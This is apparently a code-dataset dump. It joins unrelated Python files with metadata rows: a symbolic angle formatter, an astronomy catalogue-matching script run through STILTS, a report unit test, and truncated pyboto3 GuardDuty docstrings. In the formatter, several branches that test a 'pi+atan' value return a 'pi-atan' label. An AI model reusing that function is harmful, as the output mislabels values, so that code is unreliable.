if isnear((math.pi-math.atan(1.0/div))/2): return sign+"(pi-atan(1/%d))/2" % div
if isnear(math.pi-math.atan(1.0/div)/2): return sign+"(pi-atan(1/%d)/2)" % div
if isnear((math.pi+math.atan(1.0/div))/2): return sign+"(pi-atan(1/%d))/2" % div
if isnear(math.atan(math.sqrt(div))): return sign+"atan(sqrt(%d))" % div
if isnear(math.pi-math.atan(math.sqrt(div))): return sign+"(pi-atan(sqrt(%d)))" % div
if isnear(math.atan(1.0/math.sqrt(div))): return sign+"atan(1/sqrt(%d))" % div
if isnear(math.pi-math.atan(1.0/math.sqrt(div))): return sign+"(pi-atan(1/sqrt(%d)))" % div
if isnear(math.atan(1.0/math.sqrt(div))/2): return sign+"atan(1/sqrt(%d))/2" % div
if isnear((math.pi-math.atan(1.0/math.sqrt(div)))/2): return sign+"(pi-atan(1/sqrt(%d)))/2" % div
if isnear(math.pi-math.atan(1.0/math.sqrt(div))/2): return sign+"(pi-atan(1/sqrt(%d))/2)" % div
if isnear((math.pi+math.atan(1.0/math.sqrt(div)))/2): return sign+"(pi-atan(1/sqrt(%d)))/2" % div
for div in range(2,20):
for mul in range(2,19):
if div==mul:
continue
if isnear(float(div)/mul): return sign+"%d/%d" % (div,mul)
if isnear(math.sqrt(div)/mul): return sign+"sqrt(%d)/%d" % (div,mul)
if isnear(mul*math.pi/div): return sign+"%d*pi/%d" % (mul,div)
for div in range(2,20):
for mul in range(2,19):
if div==mul:
continue
if isnear(math.atan(float(mul)/div)): return sign+"atan(%d/%d)" % (mul, div)
if isnear(math.pi-math.atan(float(mul)/div)): return sign+"(pi-atan(%d/%d))" % (mul, div)
if isnear(math.atan(float(mul)/div)/2): return sign+"atan(%d/%d)/2" % (mul, div)
if isnear((math.pi-math.atan(float(mul)/div))/2): return sign+"(pi-atan(%d/%d))/2" % (mul, div)
if isnear(math.pi-math.atan(float(mul)/div)/2): return sign+"(pi-atan(%d/%d)/2)" % (mul, div)
if isnear((math.pi+math.atan(float(mul)/div))/2): return sign+"(pi+atan(%d/%d))/2" % (mul, div)
if isnear(math.atan(float(mul)/math.sqrt(div))): return sign+"atan(%d/sqrt(%d))" % (mul, div)
if isnear(math.pi-math.atan(float(mul)/math.sqrt(div))): return sign+"(pi-atan(%d/sqrt(%d)))" % (mul, div)
if isnear(math.atan(float(mul)/math.sqrt(div))/2): return sign+"atan(%d/sqrt(%d))/2" % (mul, div)
if isnear((math.pi-math.atan(float(mul)/math.sqrt(div)))/2): return sign+"(pi-atan(%d/sqrt(%d)))/2" % (mul, div)
if isnear(math.pi-math.atan(float(mul)/math.sqrt(div))/2): return sign+"(pi-atan(%d/sqrt(%d))/2)" % (mul, div)
if isnear((math.pi+math.atan(float(mul)/math.sqrt(div)))/2): return sign+"(pi-atan(%d/sqrt(%d)))/2" % (mul, div)
return str(num)
| 51.955556 | 124 | 0.567579 | 836 | 4,676 | 3.174641 | 0.062201 | 0.144687 | 0.185381 | 0.163904 | 0.866616 | 0.826677 | 0.77468 | 0.720422 | 0.681989 | 0.616428 | 0 | 0.043167 | 0.192472 | 4,676 | 89 | 125 | 52.539326 | 0.659693 | 0.028229 | 0 | 0.134328 | 0 | 0 | 0.158348 | 0.051237 | 0 | 0 | 0 | 0 | 0 | 1 | 0.029851 | false | 0 | 0.014925 | 0.014925 | 0.074627 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
a9f629fd2164d061204704b44cab65dcf40afe9c | 6,651 | py | Python | bin/bin_MD/MD-split-distinct-sub.py | JohanComparat/nbody-npt-functions | a034db4e5a9b2f87dc42eeb6059c4dd280589e4a | [
"CC0-1.0"
] | 4 | 2017-11-07T02:15:46.000Z | 2022-03-03T01:35:53.000Z | bin/bin_MD/MD-split-distinct-sub.py | JohanComparat/nbody-npt-functions | a034db4e5a9b2f87dc42eeb6059c4dd280589e4a | [
"CC0-1.0"
] | null | null | null | bin/bin_MD/MD-split-distinct-sub.py | JohanComparat/nbody-npt-functions | a034db4e5a9b2f87dc42eeb6059c4dd280589e4a | [
"CC0-1.0"
] | 2 | 2020-08-12T14:26:38.000Z | 2021-09-14T06:08:58.000Z | import glob
import os
import time
import numpy as n
import sys
def create_sat_files(fileName):
outFileName = fileName[:-5]+"_sat.fits"
command = """java -jar /home2/jcomparat/code/stilts.jar tpipe ifmt=fits in="""+fileName+""" cmd='select "pid>=0"' cmd='replacecol pid toInteger(pid)' cmd='replacecol id toInteger(id)' omode=out ofmt=fits out="""+outFileName
os.system(command)
def create_cen_files(fileName):
outFileName = fileName[:-5]+"_cen.fits"
command = """java -jar /home2/jcomparat/code/stilts.jar tpipe ifmt=fits in="""+fileName+""" cmd='select "pid==-1"' cmd='delcols "pid x y z"' cmd='replacecol id toInteger(id)' omode=out ofmt=fits out="""+outFileName
os.system(command)
def concat_sat_files(fileName):
os.system("ls "+fileName[:-5]+"*_sat.fits > list2Concat")
outFileName = fileName[:-5] + "_sat_all.fits"
command = """java -jar /home2/jcomparat/code/stilts.jar tcat ifmt=fits in=@list2Concat omode=out ofmt=fits out="""+outFileName
os.system(command)
os.system("rm list2Concat")
def concat_cen_files(fileName):
os.system("ls "+fileName[:-5]+"*_cen.fits > list2Concat")
outFileName = fileName[:-5] + "_cen_all.fits"
command = """java -jar /home2/jcomparat/code/stilts.jar tcat ifmt=fits in=@list2Concat omode=out ofmt=fits out="""+outFileName
os.system(command)
os.system("rm list2Concat")
def match_sat_cen(fileName):
satFileName = fileName[:-5] + "_sat_all.fits"
cenFileName = fileName[:-5] + "_cen_all.fits"
outFileNameA = fileName[:-5] + "_subhalos_inDistinct.fits"
outFileNameB = fileName[:-5] + "_subhalos_inSat.fits"
command = """java -jar /home2/jcomparat/code/stilts.jar tmatch2 ifmt1=fits in1="""+satFileName+""" ifmt2=fits in2="""+cenFileName+""" find=all matcher=exact join=1and2 fixcols=all suffix1="_sat" suffix2="_cen" values1=pid values2=id omode=out ofmt=fits out="""+outFileNameA
os.system(command)
command = """java -jar /home2/jcomparat/code/stilts.jar tmatch2 ifmt1=fits in1="""+satFileName+""" ifmt2=fits in2="""+satFileName+""" find=all matcher=exact join=1and2 fixcols=all suffix1="_sat_n" suffix2="_sat_n_1" values1=pid values2=id omode=out ofmt=fits out="""+outFileNameB
os.system(command)
def match_sat_cen_d2(fileName):
satFileName = fileName[:-5] + "_sat_all.fits"
cenFileName = fileName[:-5] + "_cen_all.fits"
sat_in_sat_file = fileName[:-5] + "_subhalos_inSat.fits"
outFileNameB = fileName[:-5] + "_subhalos_inSat2.fits"
outFileNameA = fileName[:-5] + "_subhalos_inDistinct2.fits"
command = """java -jar /home2/jcomparat/code/stilts.jar tmatch2 ifmt1=fits in1="""+sat_in_sat_file+""" ifmt2=fits in2="""+cenFileName+""" find=all matcher=exact join=1and2 fixcols=all suffix1="_sat_n_1" suffix2="_cen" values1=pid_sat_n_1 values2=id omode=out ofmt=fits out="""+outFileNameA
os.system(command)
command = """java -jar /home2/jcomparat/code/stilts.jar tmatch2 ifmt1=fits in1="""+sat_in_sat_file+""" ifmt2=fits in2="""+satFileName+""" find=all matcher=exact join=1and2 fixcols=all suffix1="_sat_n_1" suffix2="_sat_n_2" values1=pid_sat_n_1 values2=id omode=out ofmt=fits out="""+outFileNameB
os.system(command)
def match_sat_cen_d3(fileName):
satFileName = fileName[:-5] + "_sat_all.fits"
cenFileName = fileName[:-5] + "_cen_all.fits"
sat_in_sat_file = fileName[:-5] + "_subhalos_inSat2.fits"
outFileNameB = fileName[:-5] + "_subhalos_inSat3.fits"
outFileNameA = fileName[:-5] + "_subhalos_inDistinct3.fits"
command = """java -jar /home2/jcomparat/code/stilts.jar tmatch2 ifmt1=fits in1="""+sat_in_sat_file+""" ifmt2=fits in2="""+cenFileName+""" find=all matcher=exact join=1and2 fixcols=all suffix1="_sat_n_2" suffix2="_cen" values1=pid_sat_n_2 values2=id omode=out ofmt=fits out="""+outFileNameA
os.system(command)
command = """java -jar /home2/jcomparat/code/stilts.jar tmatch2 ifmt1=fits in1="""+sat_in_sat_file+""" ifmt2=fits in2="""+satFileName+""" find=all matcher=exact join=1and2 fixcols=all suffix1="_sat_n_2" suffix2="_sat_n_3" values1=pid_sat_n_2 values2=id omode=out ofmt=fits out="""+outFileNameB
os.system(command)
def process_MD(files, outs):
t0=time.time()
for file in files:
print file
create_sat_files(file)
print "create sat", time.time()-t0
create_cen_files(file)
print "create cen", time.time()-t0
print "-----------------------------------------"
t0=time.time()
for file in outs:
print file
concat_sat_files(file)
print "concat sat", time.time()-t0
concat_cen_files(file)
print "concat cen", time.time()-t0
print "-----------------------------------------"
t0=time.time()
for file in outs:
match_sat_cen(file)
print "match", time.time()-t0
def match_cats(outs):
t0=time.time()
for file in outs:
match_sat_cen(file)
match_sat_cen_d2(file)
match_sat_cen_d3(file)
print "match", time.time()-t0
files = n.array(glob.glob("/data2/DATA/eBOSS/DarkSkies/snapshots/ds14_*_PM_Nb_*.fits"))
files.sort()
outs = n.array(glob.glob("/data2/DATA/eBOSS/DarkSkies/snapshots/ds14_*.dat"))
outs.sort()
process_MD(files, outs)
match_cats(outs)
sys.exit()
files = n.array(glob.glob("/data2/DATA/eBOSS/Multidark-lightcones/MD_0.4Gpc/snapshots/out_*_PM_Nb_?.fits"))
files.sort()
outs = n.array(glob.glob("/data2/DATA/eBOSS/Multidark-lightcones/MD_0.4Gpc/snapshots/out_*.list"))
outs.sort()
#process_MD(files, outs)
match_cats(outs)
files = n.array(glob.glob("/data2/DATA/eBOSS/Multidark-lightcones/MD_1Gpc/snapshots/out_*_PM_Nb_?.fits"))
files.sort()
outs = n.array(glob.glob("/data2/DATA/eBOSS/Multidark-lightcones/MD_1Gpc/snapshots/out_*.list"))
outs.sort()
#process_MD(files, outs)
match_cats(outs)
files = n.array(glob.glob("/data2/DATA/eBOSS/Multidark-lightcones/MD_2.5Gpc/snapshots/out_*_PM_Nb_?.fits"))
files.sort()
outs = n.array(glob.glob("/data2/DATA/eBOSS/Multidark-lightcones/MD_2.5Gpc/snapshots/out_*.list"))
outs.sort()
#process_MD(files, outs)
match_cats(outs)
files = n.array(glob.glob("/data2/DATA/eBOSS/Multidark-lightcones/MD_2.5GpcNW/snapshots/out_*_PM_Nb_?.fits"))
files.sort()
outs = n.array(glob.glob("/data2/DATA/eBOSS/Multidark-lightcones/MD_2.5GpcNW/snapshots/out_*.list"))
outs.sort()
#process_MD(files, outs)
match_cats(outs)
files = n.array(glob.glob("/data2/DATA/eBOSS/Multidark-lightcones/MD_4GpcNW/snapshots/out_*_PM_Nb_?.fits"))
files.sort()
outs = n.array(glob.glob("/data2/DATA/eBOSS/Multidark-lightcones/MD_4GpcNW/snapshots/out_*.list"))
outs.sort()
#process_MD(files, outs)
match_cats(outs)
files = n.array(glob.glob("/data2/DATA/eBOSS/Multidark-lightcones/MD_4Gpc/snapshots/out_*_PM_Nb_?.fits"))
files.sort()
outs = n.array(glob.glob("/data2/DATA/eBOSS/Multidark-lightcones/MD_4Gpc/snapshots/out_*.list"))
outs.sort()
#process_MD(files, outs)
match_cats(outs)
| 44.939189 | 294 | 0.730868 | 1,007 | 6,651 | 4.63853 | 0.107249 | 0.038536 | 0.029972 | 0.041961 | 0.900664 | 0.824021 | 0.813316 | 0.793834 | 0.792764 | 0.780133 | 0 | 0.028002 | 0.087205 | 6,651 | 147 | 295 | 45.244898 | 0.741394 | 0.020749 | 0 | 0.470588 | 0 | 0.109244 | 0.512911 | 0.233477 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.042017 | null | null | 0.084034 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
e751ad213de5a7a3bfcf8a388bcd29e5bdaed7f8 | 9,516 | py | Python | api/tests/test_report.py | equinor/lcm | 338bf67e6eb412446e469b4c73f7000990445ebd | [
"MIT"
] | 3 | 2020-12-02T11:14:31.000Z | 2021-12-09T16:53:53.000Z | api/tests/test_report.py | equinor/lcm | 338bf67e6eb412446e469b4c73f7000990445ebd | [
"MIT"
] | 76 | 2020-09-29T10:59:10.000Z | 2022-01-03T07:41:29.000Z | api/tests/test_report.py | equinor/lcm | 338bf67e6eb412446e469b4c73f7000990445ebd | [
"MIT"
] | 2 | 2021-01-25T14:24:57.000Z | 2021-01-25T14:51:16.000Z | import unittest
from pathlib import Path
from config import Config
from controllers.report import create_report
request = {
"fitness": 4.4,
"curve": [
24.760265984966853,
24.760265984966853,
24.760265984966853,
24.760265984966853,
24.760265984966853,
24.760265984966853,
24.760265984966853,
24.760265984966853,
24.66132013232447,
24.405921000051023,
24.405921000051023,
24.405921000051023,
24.405921000051023,
24.405921000051023,
24.263870398510857,
23.157464646595628,
23.157464646595628,
23.157464646595628,
23.157464646595628,
23.157464646595628,
23.157464646595628,
23.157464646595628,
23.157464646595628,
23.157464646595628,
23.157464646595628,
23.157464646595628,
23.157464646595628,
23.157464646595628,
23.157464646595628,
23.157464646595628,
23.157464646595628,
23.157464646595628,
23.157464646595628,
23.157464646595628,
23.14494941140656,
22.79260349905688,
22.76124725733934,
22.76124725733934,
22.70409513574823,
22.70409513574823,
22.70409513574823,
22.70409513574823,
22.70409513574823,
22.70409513574823,
22.03365351452154,
22.03365351452154,
22.0039560668872,
22.0039560668872,
22.0039560668872,
22.0039560668872,
22.0039560668872,
22.0039560668872,
22.0039560668872,
22.0039560668872,
22.0039560668872,
22.0039560668872,
22.0039560668872,
22.0039560668872,
22.0039560668872,
22.0039560668872,
22.0039560668872,
22.0039560668872,
22.0039560668872,
22.0039560668872,
22.0039560668872,
22.0039560668872,
22.0039560668872,
21.936000287548488,
21.371589345517165,
21.05947717635218,
21.05947717635218,
19.968809996991478,
19.968809996991478,
19.968809996991478,
19.968809996991478,
19.968809996991478,
19.968809996991478,
19.968809996991478,
19.968809996991478,
19.968809996991478,
19.968809996991478,
19.968809996991478,
19.968809996991478,
19.70095921290463,
19.67310843030912,
19.67310843030912,
19.67310843030912,
19.67310843030912,
19.67310843030912,
19.67310843030912,
19.67310843030912,
19.67310843030912,
19.67310843030912,
19.569920974028108,
19.569920974028108,
19.424168524288945,
19.424168524288945,
19.424168524288945,
19.424168524288945,
19.424168524288945,
19.424168524288945,
19.424168524288945,
19.424168524288945,
19.424168524288945,
19.424168524288945,
19.424168524288945,
19.424168524288945,
19.424168524288945,
19.424168524288945,
19.424168524288945,
19.424168524288945,
19.424168524288945,
19.424168524288945,
19.424168524288945,
19.424168524288945,
19.424168524288945,
19.424168524288945,
18.834064835696655,
18.815049522335027,
18.815049522335027,
18.815049522335027,
18.815049522335027,
18.815049522335027,
18.815049522335027,
18.815049522335027,
18.815049522335027,
18.815049522335027,
18.815049522335027,
18.815049522335027,
18.815049522335027,
18.815049522335027,
18.815049522335027,
18.815049522335027,
18.815049522335027,
18.815049522335027,
18.815049522335027,
18.815049522335027,
18.815049522335027,
18.815049522335027,
18.815049522335027,
18.815049522335027,
18.815049522335027,
18.815049522335027,
18.815049522335027,
18.80877678463467,
17.67603549803516,
17.67603549803516,
17.67603549803516,
17.67603549803516,
17.67603549803516,
17.67603549803516,
17.669540861902142,
16.339579565159493,
16.339579565159493,
16.339579565159493,
16.339579565159493,
16.339579565159493,
16.339579565159493,
16.339579565159493,
16.339579565159493,
16.339579565159493,
16.339579565159493,
16.339579565159493,
16.339579565159493,
16.339579565159493,
16.339579565159493,
16.339579565159493,
16.339579565159493,
16.339579565159493,
16.339579565159493,
16.339579565159493,
16.339579565159493,
16.339579565159493,
16.339579565159493,
16.337756146654282,
16.337756146654282,
15.929791913230055,
15.929791913230055,
14.868801445516398,
14.868801445516398,
14.868801445516398,
14.868801445516398,
14.868801445516398,
14.868801445516398,
14.868801445516398,
14.868801445516398,
14.868801445516398,
14.868801445516398,
14.868801445516398,
14.868801445516398,
14.867630817358892,
14.867630817358892,
14.867630817358892,
14.867630817358892,
14.867630817358892,
14.867630817358892,
14.867630817358892,
14.867630817358892,
14.867630817358892,
14.867630817358892,
14.867630817358892,
14.867630817358892,
14.867630817358892,
14.867630817358892,
14.867630817358892,
14.867630817358892,
14.867630817358892,
14.867630817358892,
14.867630817358892,
14.860424440477974,
14.539091423284532,
14.539091423284532,
14.539091423284532,
14.437161475477517,
14.437161475477517,
14.437161475477517,
14.437161475477517,
14.437161475477517,
14.437161475477517,
14.168245320431206,
14.168245320431206,
14.168245320431206,
14.168245320431206,
14.168245320431206,
14.168245320431206,
14.168245320431206,
14.168245320431206,
14.168245320431206,
14.168245320431206,
13.846770027057604,
13.846770027057604,
13.846770027057604,
13.442128212486182,
13.442128212486182,
13.442128212486182,
13.442128212486182,
13.442128212486182,
13.442128212486182,
13.442128212486182,
12.854682185001785,
12.854682185001785,
12.269860280355859,
12.269860280355859,
12.269860280355859,
12.269860280355859,
11.649962921657089,
11.649962921657089,
11.649962921657089,
11.649962921657089,
11.649962921657089,
11.649962921657089,
11.649962921657089,
11.649962921657089,
11.649962921657089,
11.649962921657089,
11.649962921657089,
11.649962921657089,
11.649962921657089,
11.649962921657089,
11.649962921657089,
11.649962921657089,
11.649962921657089,
11.649962921657089,
11.649962921657089,
11.649962921657089,
11.649962921657089,
11.649962921657089,
11.649962921657089,
11.649962921657089,
11.649962921657089,
11.649962921657089,
11.649962921657089,
11.649962921657089,
11.649962921657089,
11.649962921657089,
11.649962921657089,
11.616263088138906,
11.616263088138906,
11.616263088138906,
11.145731745164484,
11.145731745164484,
11.145731745164484,
11.145731745164484,
11.145731745164484,
11.145731745164484,
11.145731745164484,
11.145731745164484,
11.145731745164484,
11.145731745164484,
10.634358227132175,
10.634358227132175,
10.396491622667979,
10.396491622667979,
10.396491622667979,
10.396491622667979,
10.396491622667979,
10.396491622667979,
10.396491622667979,
10.396491622667979,
10.396491622667979,
],
"pillVolume": 10,
"pillDensity": 350,
"bridgingMode": "PERMEABILITY",
"bridgingValue": 500,
"weighting": {"bridge": 5, "mass": 5, "products": 5},
"products": {
"b": {"id": "baracarb150", "value": 45, "percentage": 12},
"c": {"id": "supercom", "value": 88, "percentage": 12},
"d": {"id": "compound-V", "value": 77, "percentage": 12},
"e": {"id": "tight-seal", "value": 5, "percentage": 12},
"f": {"id": "tighterfit", "value": 6, "percentage": 12},
"g": {"id": "Compund-B", "value": 56, "percentage": 12},
},
"totalMass": 3500,
"email": "test@equinor.com",
"user": "Test Testson",
}
class ReportTest(unittest.TestCase):
@staticmethod
def test_create_report():
create_report(request, bridge=False)
result = Path(f"{Config.HOME_DIR}/report.pdf")
# Check if file was created
assert result.is_file()
# Check that file has a minimum size of 30KB
assert result.stat().st_size > 30000
| 28.070796 | 66 | 0.600147 | 737 | 9,516 | 7.739484 | 0.187246 | 0.092391 | 0.103261 | 0.178822 | 0.806101 | 0.779628 | 0.767707 | 0.767707 | 0.767707 | 0.752454 | 0 | 0.776706 | 0.313367 | 9,516 | 338 | 67 | 28.153846 | 0.096266 | 0.007146 | 0 | 0.870482 | 0 | 0 | 0.036527 | 0.002965 | 0 | 0 | 0 | 0 | 0.006024 | 1 | 0.003012 | false | 0 | 0.012048 | 0 | 0.018072 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
e7b1ea7e52e2857bcb9379a269e5ff1816c7850d | 134,767 | py | Python | pyboto3/guardduty.py | gehad-shaat/pyboto3 | 4a0c2851a8bc04fb1c71c36086f7bb257e48181d | [
"MIT"
] | 91 | 2016-12-31T11:38:37.000Z | 2021-09-16T19:33:23.000Z | pyboto3/guardduty.py | gehad-shaat/pyboto3 | 4a0c2851a8bc04fb1c71c36086f7bb257e48181d | [
"MIT"
] | 7 | 2017-01-02T18:54:23.000Z | 2020-08-11T13:54:02.000Z | pyboto3/guardduty.py | gehad-shaat/pyboto3 | 4a0c2851a8bc04fb1c71c36086f7bb257e48181d | [
"MIT"
] | 26 | 2016-12-31T13:11:00.000Z | 2022-03-03T21:01:12.000Z | '''
The MIT License (MIT)
Copyright (c) 2016 WavyCloud
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
def accept_invitation(DetectorId=None, MasterId=None, InvitationId=None):
"""
Accepts the invitation to be monitored by a master GuardDuty account.
See also: AWS API Documentation
Exceptions
:example: response = client.accept_invitation(
DetectorId='string',
MasterId='string',
InvitationId='string'
)
:type DetectorId: string
:param DetectorId: [REQUIRED]\nThe unique ID of the detector of the GuardDuty member account.\n
:type MasterId: string
:param MasterId: [REQUIRED]\nThe account ID of the master GuardDuty account whose invitation you\'re accepting.\n
:type InvitationId: string
:param InvitationId: [REQUIRED]\nThe value that is used to validate the master account to the member account.\n
:rtype: dict
ReturnsResponse Syntax
{}
Response Structure
(dict) --
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {}
:returns:
(dict) --
"""
pass
def archive_findings(DetectorId=None, FindingIds=None):
"""
Archives GuardDuty findings that are specified by the list of finding IDs.
See also: AWS API Documentation
Exceptions
:example: response = client.archive_findings(
DetectorId='string',
FindingIds=[
'string',
]
)
:type DetectorId: string
:param DetectorId: [REQUIRED]\nThe ID of the detector that specifies the GuardDuty service whose findings you want to archive.\n
:type FindingIds: list
:param FindingIds: [REQUIRED]\nThe IDs of the findings that you want to archive.\n\n(string) --\n\n
:rtype: dict
ReturnsResponse Syntax
{}
Response Structure
(dict) --
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {}
:returns:
(dict) --
"""
pass
def can_paginate(operation_name=None):
"""
Check if an operation can be paginated.
:type operation_name: string
:param operation_name: The operation name. This is the same name\nas the method name on the client. For example, if the\nmethod name is create_foo, and you\'d normally invoke the\noperation as client.create_foo(**kwargs), if the\ncreate_foo operation can be paginated, you can use the\ncall client.get_paginator('create_foo').
"""
pass
def create_detector(Enable=None, ClientToken=None, FindingPublishingFrequency=None, Tags=None):
"""
Creates a single Amazon GuardDuty detector. A detector is a resource that represents the GuardDuty service. To start using GuardDuty, you must create a detector in each Region where you enable the service. You can have only one detector per account per Region.
See also: AWS API Documentation
Exceptions
:example: response = client.create_detector(
Enable=True|False,
ClientToken='string',
FindingPublishingFrequency='FIFTEEN_MINUTES'|'ONE_HOUR'|'SIX_HOURS',
Tags={
'string': 'string'
}
)
:type Enable: boolean
:param Enable: [REQUIRED]\nA Boolean value that specifies whether the detector is to be enabled.\n
:type ClientToken: string
:param ClientToken: The idempotency token for the create request.\nThis field is autopopulated if not provided.\n
:type FindingPublishingFrequency: string
:param FindingPublishingFrequency: An enum value that specifies how frequently updated findings are exported.
:type Tags: dict
:param Tags: The tags to be added to a new detector resource.\n\n(string) --\n(string) --\n\n\n\n
:rtype: dict
ReturnsResponse Syntax
{
'DetectorId': 'string'
}
Response Structure
(dict) --
DetectorId (string) --
The unique ID of the created detector.
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {
'DetectorId': 'string'
}
:returns:
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
"""
pass
def create_filter(DetectorId=None, Name=None, Description=None, Action=None, Rank=None, FindingCriteria=None, ClientToken=None, Tags=None):
"""
Creates a filter using the specified finding criteria.
See also: AWS API Documentation
Exceptions
:example: response = client.create_filter(
DetectorId='string',
Name='string',
Description='string',
Action='NOOP'|'ARCHIVE',
Rank=123,
FindingCriteria={
'Criterion': {
'string': {
'Eq': [
'string',
],
'Neq': [
'string',
],
'Gt': 123,
'Gte': 123,
'Lt': 123,
'Lte': 123,
'Equals': [
'string',
],
'NotEquals': [
'string',
],
'GreaterThan': 123,
'GreaterThanOrEqual': 123,
'LessThan': 123,
'LessThanOrEqual': 123
}
}
},
ClientToken='string',
Tags={
'string': 'string'
}
)
:type DetectorId: string
:param DetectorId: [REQUIRED]\nThe unique ID of the detector of the GuardDuty account that you want to create a filter for.\n
:type Name: string
:param Name: [REQUIRED]\nThe name of the filter.\n
:type Description: string
:param Description: The description of the filter.
:type Action: string
:param Action: Specifies the action that is to be applied to the findings that match the filter.
:type Rank: integer
:param Rank: Specifies the position of the filter in the list of current filters. Also specifies the order in which this filter is applied to the findings.
:type FindingCriteria: dict
:param FindingCriteria: [REQUIRED]\nRepresents the criteria to be used in the filter for querying findings.\nYou can only use the following attributes to query findings:\n\naccountId\nregion\nconfidence\nid\nresource.accessKeyDetails.accessKeyId\nresource.accessKeyDetails.principalId\nresource.accessKeyDetails.userName\nresource.accessKeyDetails.userType\nresource.instanceDetails.iamInstanceProfile.id\nresource.instanceDetails.imageId\nresource.instanceDetails.instanceId\nresource.instanceDetails.outpostArn\nresource.instanceDetails.networkInterfaces.ipv6Addresses\nresource.instanceDetails.networkInterfaces.privateIpAddresses.privateIpAddress\nresource.instanceDetails.networkInterfaces.publicDnsName\nresource.instanceDetails.networkInterfaces.publicIp\nresource.instanceDetails.networkInterfaces.securityGroups.groupId\nresource.instanceDetails.networkInterfaces.securityGroups.groupName\nresource.instanceDetails.networkInterfaces.subnetId\nresource.instanceDetails.networkInterfaces.vpcId\nresource.instanceDetails.tags.key\nresource.instanceDetails.tags.value\nresource.resourceType\nservice.action.actionType\nservice.action.awsApiCallAction.api\nservice.action.awsApiCallAction.callerType\nservice.action.awsApiCallAction.remoteIpDetails.city.cityName\nservice.action.awsApiCallAction.remoteIpDetails.country.countryName\nservice.action.awsApiCallAction.remoteIpDetails.ipAddressV4\nservice.action.awsApiCallAction.remoteIpDetails.organization.asn\nservice.action.awsApiCallAction.remoteIpDetails.organization.asnOrg\nservice.action.awsApiCallAction.serviceName\nservice.action.dnsRequestAction.domain\nservice.action.networkConnectionAction.blocked\nservice.action.networkConnectionAction.connectionDirection\nservice.action.networkConnectionAction.localPortDetails.port\nservice.action.networkConnectionAction.protocol\nservice.action.networkConnectionAction.localIpDetails.ipAddressV4\nservice.action.networkConnectionAction.remoteIpDetails.city.cityName\nservice.action.networkConnectionAction.remoteIpDetails.country.countryName\nservice.action.networkConnectionAction.remoteIpDetails.ipAddressV4\nservice.action.networkConnectionAction.remoteIpDetails.organization.asn\nservice.action.networkConnectionAction.remoteIpDetails.organization.asnOrg\nservice.action.networkConnectionAction.remotePortDetails.port\nservice.additionalInfo.threatListName\nservice.archived When this attribute is set to TRUE, only archived findings are listed. When it\'s set to FALSE, only unarchived findings are listed. When this attribute is not set, all existing findings are listed.\nservice.resourceRole\nseverity\ntype\nupdatedAt Type: ISO 8601 string format: YYYY-MM-DDTHH:MM:SS.SSSZ or YYYY-MM-DDTHH:MM:SSZ depending on whether the value contains milliseconds.\n\n\nCriterion (dict) --Represents a map of finding properties that match specified conditions and values when querying findings.\n\n(string) --\n(dict) --Contains information about the condition.\n\nEq (list) --Represents the equal condition to be applied to a single field when querying for findings.\n\n(string) --\n\n\nNeq (list) --Represents the not equal condition to be applied to a single field when querying for findings.\n\n(string) --\n\n\nGt (integer) --Represents a greater than condition to be applied to a single field when querying for findings.\n\nGte (integer) --Represents a greater than or equal condition to be applied to a single field when querying for findings.\n\nLt (integer) --Represents a less than condition to be applied to a single field when querying for findings.\n\nLte (integer) --Represents a less than or equal condition to be applied to a single field when querying for findings.\n\nEquals (list) --Represents an equal condition to be applied to a single field when querying for findings.\n\n(string) --\n\n\nNotEquals (list) --Represents a not equal condition to be applied to a single field when querying for findings.\n\n(string) --\n\n\nGreaterThan (integer) --Represents a greater than condition to be applied to a single field when querying for findings.\n\nGreaterThanOrEqual (integer) --Represents a greater than or equal condition to be applied to a single field when querying for findings.\n\nLessThan (integer) --Represents a less than condition to be applied to a single field when querying for findings.\n\nLessThanOrEqual (integer) --Represents a less than or equal condition to be applied to a single field when querying for findings.\n\n\n\n\n\n\n\n\n
:type ClientToken: string
:param ClientToken: The idempotency token for the create request.\nThis field is autopopulated if not provided.\n
:type Tags: dict
:param Tags: The tags to be added to a new filter resource.\n\n(string) --\n(string) --\n\n\n\n
:rtype: dict
ReturnsResponse Syntax
{
'Name': 'string'
}
Response Structure
(dict) --
Name (string) --
The name of the successfully created filter.
Exceptions
